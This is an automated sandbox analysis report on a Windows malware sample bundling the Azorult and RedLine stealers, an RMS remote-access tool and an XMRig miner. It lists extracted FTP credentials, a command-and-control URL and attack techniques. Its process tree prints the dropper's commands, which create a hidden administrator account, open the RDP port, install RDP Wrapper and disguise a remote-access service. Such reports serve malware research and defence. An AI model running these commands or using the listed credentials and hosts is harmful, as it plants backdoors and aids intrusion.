azorult | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

Analysis

max time kernel
302s
max time network
305s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.exe

Score

10^/10

azorult redline rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
45.141.184.35
Port:
21
Username:
alex
Password:
easypassword

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.91
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

resource	yara_rule
behavioral23/files/0x000300000001abcc-309.dat	family_redline
behavioral23/files/0x000300000001abcc-310.dat	family_redline

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral23/files/0x000100000001ab8f-53.dat	acprotect
behavioral23/files/0x000100000001ab8e-52.dat	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 3 IoCs

miner

resource	yara_rule
behavioral23/files/0x000100000001abbf-364.dat	xmrig
behavioral23/files/0x000100000001abbf-998.dat	xmrig
behavioral23/memory/5500-999-0x00007FF6F7F90000-0x00007FF6F8530000-memory.dmp	xmrig

ASPack v2.12-2.42 5 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral23/files/0x000100000001ab8c-33.dat	aspack_v212_v242
behavioral23/files/0x000100000001ab8c-34.dat	aspack_v212_v242
behavioral23/files/0x000100000001ab8c-42.dat	aspack_v212_v242
behavioral23/files/0x000100000001ab8c-47.dat	aspack_v212_v242
behavioral23/files/0x000100000001ab8c-49.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	update.exe

Executes dropped EXE 24 IoCs

pid	Process
4244	wini.exe
4416	winit.exe
1764	cheat.exe
4016	taskhost.exe
4560	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
2392	taskhostw.exe
3868	R8.exe
2916	Rar.exe
4352	utorrent.exe
3404	azur.exe
2396	RDPWInst.exe
560	system.exe
2160	update.exe
944	RDPWinst.exe
4176	taskhost.exe
5140	RDPWInst.exe
5324	winlogon.exe
3088	audiodg.exe
5500	MicrosoftHost.exe
1972	taskhostw.exe
5236	taskhostw.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral23/files/0x000100000001ab8f-53.dat	upx
behavioral23/files/0x000100000001ab8e-52.dat	upx
behavioral23/files/0x000100000001abd0-255.dat	upx
behavioral23/files/0x000100000001abd0-256.dat	upx
behavioral23/files/0x000200000001abd5-313.dat	upx
behavioral23/files/0x000200000001abd5-314.dat	upx
behavioral23/files/0x000400000001abca-348.dat	upx
behavioral23/files/0x000400000001abca-349.dat	upx

Loads dropped DLL 5 IoCs

pid	Process
3404	azur.exe
3404	azur.exe
3404	azur.exe
3404	azur.exe
1288	svchost.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1108	icacls.exe
4152	icacls.exe
3508	icacls.exe
3644	icacls.exe
1020	icacls.exe
3096	icacls.exe
2372	icacls.exe
3948	icacls.exe
720	icacls.exe
1052	icacls.exe
4596	icacls.exe
768	icacls.exe
4056	icacls.exe
2248	icacls.exe
1156	icacls.exe
4048	icacls.exe
2588	icacls.exe
476	icacls.exe
4896	icacls.exe
196	icacls.exe
1492	icacls.exe
4984	icacls.exe
3328	icacls.exe
4084	icacls.exe
500	icacls.exe
3932	icacls.exe
3196	icacls.exe
1616	icacls.exe
3052	icacls.exe
4620	icacls.exe
1192	icacls.exe
2900	icacls.exe
4468	icacls.exe
4812	icacls.exe
4804	icacls.exe
2472	icacls.exe
4040	icacls.exe
3272	icacls.exe
184	icacls.exe
3876	icacls.exe
4708	icacls.exe
2408	icacls.exe
2100	icacls.exe
2952	icacls.exe
420	icacls.exe
3324	icacls.exe
1784	icacls.exe
2548	icacls.exe
1760	icacls.exe
4480	icacls.exe
4268	icacls.exe
4628	icacls.exe
3104	icacls.exe
1892	icacls.exe
4540	icacls.exe
2564	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com
50	checkip.amazonaws.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	update.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	update.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	update.exe

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Windows\SysWOW64\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\symbols\exe\rutserv.pdb	rutserv.exe
File opened for modification	C:\Windows\System32\winmgmts:\localhost\root\CIMV2	taskhost.exe

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\COMODO	update.exe
File opened for modification	C:\Program Files\SpyHunter	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	utorrent.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	update.exe
File opened for modification	C:\Program Files\Malwarebytes	update.exe
File opened for modification	C:\Program Files (x86)\AVG	update.exe
File opened for modification	C:\Program Files (x86)\Cezurity	update.exe
File opened for modification	C:\Program Files\Cezurity	update.exe
File opened for modification	C:\Program Files\ESET	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	update.exe
File opened for modification	C:\Program Files\AVG	update.exe
File opened for modification	C:\Program Files\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	update.exe
File opened for modification	C:\Program Files\Common Files\McAfee	update.exe
File opened for modification	C:\Program Files (x86)\360	update.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	update.exe
File opened for modification	C:\Program Files\Enigma Software Group	update.exe
File opened for modification	C:\Program Files\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	update.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	update.exe
File opened for modification	C:\Program Files (x86)\Panda Security	update.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\ByteFence	update.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	utorrent.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	azur.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	azur.exe

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2980	schtasks.exe
4256	schtasks.exe
4904	schtasks.exe
644	schtasks.exe
4524	schtasks.exe
4576	schtasks.exe
2316	schtasks.exe

Delays execution with timeout.exe 6 IoCs

evasion

pid	Process
1300	timeout.exe
1000	timeout.exe
4672	timeout.exe
2816	timeout.exe
1504	timeout.exe
1988	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
5540	ipconfig.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
4720	taskkill.exe
4424	taskkill.exe
2300	taskkill.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	update.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	utorrent.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1056	regedit.exe
1188	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4768	update.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
4560	rutserv.exe
2728	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4476	rutserv.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe
4416	winit.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2392	taskhostw.exe
4176	taskhost.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
620	Process not Found
620	Process not Found
620	Process not Found

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4560	rutserv.exe
Token: SeDebugPrivilege	4716	rutserv.exe
Token: SeTakeOwnershipPrivilege	4476	rutserv.exe
Token: SeTcbPrivilege	4476	rutserv.exe
Token: SeTcbPrivilege	4476	rutserv.exe
Token: SeDebugPrivilege	4720	taskkill.exe
Token: SeDebugPrivilege	4424	taskkill.exe
Token: SeDebugPrivilege	2300	taskkill.exe
Token: SeDebugPrivilege	2396	RDPWInst.exe
Token: SeDebugPrivilege	560	system.exe
Token: SeAuditPrivilege	1288	svchost.exe
Token: SeDebugPrivilege	944	RDPWinst.exe
Token: SeAuditPrivilege	4952	svchost.exe
Token: SeLockMemoryPrivilege	5500	MicrosoftHost.exe
Token: SeLockMemoryPrivilege	5500	MicrosoftHost.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2160	update.exe
2160	update.exe
2160	update.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
2160	update.exe
2160	update.exe
2160	update.exe

Suspicious use of SetWindowsHookEx 11 IoCs

pid	Process
4416	winit.exe
4016	taskhost.exe
4560	rutserv.exe
2728	rutserv.exe
4716	rutserv.exe
4476	rutserv.exe
4724	WinMail.exe
4624	WinMail.exe
2392	taskhostw.exe
3868	R8.exe
2160	update.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 4244	4768	update.exe	75
PID 4768 wrote to memory of 4244	4768	update.exe	75
PID 4768 wrote to memory of 4244	4768	update.exe	75
PID 4244 wrote to memory of 4068	4244	wini.exe	76
PID 4244 wrote to memory of 4068	4244	wini.exe	76
PID 4244 wrote to memory of 4068	4244	wini.exe	76
PID 4244 wrote to memory of 4416	4244	wini.exe	77
PID 4244 wrote to memory of 4416	4244	wini.exe	77
PID 4244 wrote to memory of 4416	4244	wini.exe	77
PID 4068 wrote to memory of 856	4068	WScript.exe	79
PID 4068 wrote to memory of 856	4068	WScript.exe	79
PID 4068 wrote to memory of 856	4068	WScript.exe	79
PID 856 wrote to memory of 1056	856	cmd.exe	81
PID 856 wrote to memory of 1056	856	cmd.exe	81
PID 856 wrote to memory of 1056	856	cmd.exe	81
PID 856 wrote to memory of 1188	856	cmd.exe	82
PID 856 wrote to memory of 1188	856	cmd.exe	82
PID 856 wrote to memory of 1188	856	cmd.exe	82
PID 856 wrote to memory of 1300	856	cmd.exe	83
PID 856 wrote to memory of 1300	856	cmd.exe	83
PID 856 wrote to memory of 1300	856	cmd.exe	83
PID 4768 wrote to memory of 1764	4768	update.exe	86
PID 4768 wrote to memory of 1764	4768	update.exe	86
PID 4768 wrote to memory of 1764	4768	update.exe	86
PID 1764 wrote to memory of 4016	1764	cheat.exe	88
PID 1764 wrote to memory of 4016	1764	cheat.exe	88
PID 1764 wrote to memory of 4016	1764	cheat.exe	88
PID 4768 wrote to memory of 4524	4768	update.exe	89
PID 4768 wrote to memory of 4524	4768	update.exe	89
PID 4768 wrote to memory of 4524	4768	update.exe	89
PID 856 wrote to memory of 4560	856	cmd.exe	91
PID 856 wrote to memory of 4560	856	cmd.exe	91
PID 856 wrote to memory of 4560	856	cmd.exe	91
PID 4768 wrote to memory of 4576	4768	update.exe	92
PID 4768 wrote to memory of 4576	4768	update.exe	92
PID 4768 wrote to memory of 4576	4768	update.exe	92
PID 4768 wrote to memory of 2316	4768	update.exe	94
PID 4768 wrote to memory of 2316	4768	update.exe	94
PID 4768 wrote to memory of 2316	4768	update.exe	94
PID 856 wrote to memory of 2728	856	cmd.exe	96
PID 856 wrote to memory of 2728	856	cmd.exe	96
PID 856 wrote to memory of 2728	856	cmd.exe	96
PID 4768 wrote to memory of 2980	4768	update.exe	97
PID 4768 wrote to memory of 2980	4768	update.exe	97
PID 4768 wrote to memory of 2980	4768	update.exe	97
PID 4768 wrote to memory of 4644	4768	update.exe	98
PID 4768 wrote to memory of 4644	4768	update.exe	98
PID 4768 wrote to memory of 4644	4768	update.exe	98
PID 4644 wrote to memory of 4732	4644	cmd.exe	101
PID 4644 wrote to memory of 4732	4644	cmd.exe	101
PID 4644 wrote to memory of 4732	4644	cmd.exe	101
PID 856 wrote to memory of 4716	856	cmd.exe	102
PID 856 wrote to memory of 4716	856	cmd.exe	102
PID 856 wrote to memory of 4716	856	cmd.exe	102
PID 4768 wrote to memory of 212	4768	update.exe	103
PID 4768 wrote to memory of 212	4768	update.exe	103
PID 4768 wrote to memory of 212	4768	update.exe	103
PID 212 wrote to memory of 2476	212	cmd.exe	106
PID 212 wrote to memory of 2476	212	cmd.exe	106
PID 212 wrote to memory of 2476	212	cmd.exe	106
PID 4768 wrote to memory of 2716	4768	update.exe	107
PID 4768 wrote to memory of 2716	4768	update.exe	107
PID 4768 wrote to memory of 2716	4768	update.exe	107
PID 4768 wrote to memory of 2256	4768	update.exe	109

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3952	attrib.exe
3712	attrib.exe
5224	attrib.exe
5244	attrib.exe
5264	attrib.exe

C:\Users\Admin\AppData\Local\Temp\update.exe
"C:\Users\Admin\AppData\Local\Temp\update.exe"
1⤵
- Drops file in Drivers directory
- Modifies WinLogon
- Drops file in Program Files directory
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4768
- C:\ProgramData\Microsoft\Intel\wini.exe
  C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:4244
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:856
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg1.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1056
    - - C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "reg2.reg"
        5⤵
        Runs .reg file with regedit
        
        PID:1188
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        5⤵
        Delays execution with timeout.exe
        
        PID:1300
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /silentinstall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4560
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /firewall
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2728
    - - C:\ProgramData\Windows\rutserv.exe
        
        rutserv.exe /start
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:4716
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows\*.*
        5⤵
        Views/modifies file attributes
        
        PID:3952
    - - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        5⤵
        Views/modifies file attributes
        
        PID:3712
    - - C:\Windows\SysWOW64\sc.exe
        
        sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
        5⤵
        
        PID:4208
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService obj= LocalSystem type= interact type= own
        5⤵
        
        PID:2504
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config RManService DisplayName= "Microsoft Framework"
        5⤵
        
        PID:2148
- - C:\ProgramData\Windows\winit.exe
    "C:\ProgramData\Windows\winit.exe"
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:4416
  - - C:\Program Files (x86)\Windows Mail\WinMail.exe
      "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
      4⤵
      Suspicious use of SetWindowsHookEx
      PID:4724
    - - C:\Program Files\Windows Mail\WinMail.exe
        
        "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
      4⤵
      PID:4632
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:1000
- C:\programdata\install\cheat.exe
  C:\programdata\install\cheat.exe -pnaxui
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\ProgramData\Microsoft\Intel\taskhost.exe
    "C:\ProgramData\Microsoft\Intel\taskhost.exe"
    3⤵
    - Executes dropped EXE
    - NTFS ADS
    - Suspicious use of SetWindowsHookEx
    PID:4016
  - - C:\Programdata\RealtekHD\taskhostw.exe
      C:\Programdata\RealtekHD\taskhostw.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of SetWindowsHookEx
      PID:2392
  - - C:\ProgramData\Microsoft\Intel\R8.exe
      C:\ProgramData\Microsoft\Intel\R8.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:3868
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
        5⤵
        
        PID:3204
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
        6⤵
        Modifies registry class
        
        PID:1312
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:4672
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        7⤵
        
        PID:2152
        
        C:\rdp\Rar.exe
        
        "Rar.exe" e -p555 db.rar
        7⤵
        Executes dropped EXE
        
        PID:2916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im Rar.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        7⤵
        Delays execution with timeout.exe
        
        PID:2816
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
        7⤵
        
        PID:3788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
        8⤵
        
        PID:1768
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
        9⤵
        
        PID:4856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
        9⤵
        
        PID:4588
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
        9⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\net.exe
        
        net.exe user "john" "12345" /add
        9⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user "john" "12345" /add
        10⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        9⤵
        
        PID:4688
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Администраторы" "John" /add
        9⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
        10⤵
        
        PID:2136
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        9⤵
        
        PID:3488
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        9⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        10⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        9⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        10⤵
        
        PID:4552
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного рабочего стола" John /add
        9⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
        10⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Пользователи удаленного управления" John /add
        9⤵
        
        PID:2616
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
        10⤵
        
        PID:4472
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        9⤵
        
        PID:3100
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        10⤵
        
        PID:3356
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        9⤵
        
        PID:908
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        9⤵
        
        PID:4572
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        
        PID:552
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        9⤵
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2396
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        10⤵
        
        PID:4528
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        9⤵
        Executes dropped EXE
        
        PID:5140
        
